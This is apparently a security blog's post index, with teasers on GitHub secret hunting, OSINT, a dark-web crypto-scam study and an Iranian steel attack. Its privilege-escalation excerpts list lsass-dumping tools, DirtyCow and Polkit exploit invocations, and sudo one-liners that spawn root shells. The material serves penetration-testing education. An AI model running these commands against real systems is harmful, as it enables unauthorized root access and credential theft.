Blog

Github in the wild

Github is important. Oftentimes sensitive secrets stored in a target’s GitHub environment are overlooked and thus not reported in the tool output due to the limitations of automated scanning (regex, entropy searches, etc.). On the flip side, too much information can be output by automated tools, making it difficult to discern true secrets from a …

Introduction to Doxing

Introduction to OSINT

OSINT. OSINT stands for Open Source Intelligence and is one of the key aspects in understanding the cybersecurity that rules the Internet these days. The term OSINT dates back many decades; in fact, US military agencies started using it in the late 1980s as they were re-evaluating …

43 Methods for Privilege Escalation (Part 3)

Dump lsass with SilentProcessExit | Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunting | Methods: SilentProcessExit.exe pid

Lsass Shtinkering | Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunting | Methods: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->2 LSASS_Shtinkering.exe pid

AndrewSpecial | Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunting | Methods: AndrewSpecial.exe

CCACHE ticket reuse from …

74 Methods for Privilege Escalation(Part 2)

DirtyC0w | Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit | Methods: gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

CVE-2016-1531 | Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit | Methods: CVE-2016-1531.sh;id

Polkit | Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit | Methods: 1. 2. poc.sh

DirtyPipe | Domain: No | Local Admin: Yes | OS: …

40 Methods for Privilege Escalation(Part 1)

Abusing Sudo Binaries | Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Privileged Files | Methods:

sudo vim -c ':!/bin/bash'

sudo find / etc/passwd -exec /bin/bash \;

echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

sudo env /bin/bash

sudo awk 'BEGIN {system("/bin/bash")}'

sudo perl -e 'exec "/bin/bash";'

sudo python -c 'import pty;pty.spawn("/bin/bash")'

sudo less /etc/hosts – …

40 Days in Deep/Dark Web About Crypto Scam

Forward About document Summary of finding Tools Fake Transaction Generator Market drainer Nocryi Logs BradMax Logs Baron Cloud Logs Fate Cloud Logs Log Checker Magnus Ransomware Brute Force Seed Key Log Checker Wallet_dat_net Venom rat Redline  Abbrv. Market drainer Auto transfer Crypto base Mixed log Fake transaction Seed key crack RAMP Auto-withdrawal Forward Last year …

TTPs Reviews In Attack Against The Industry in Iran

A major cyberattack has hit the Iranian steel industry today, with hackers claiming to have taken control of systems at three state-owned companies. The incident may be the latest salvo in the escalating cyberwar between Iran and Israel. The video contains footage which purports to show the hacking group taking control of machinery inside one …
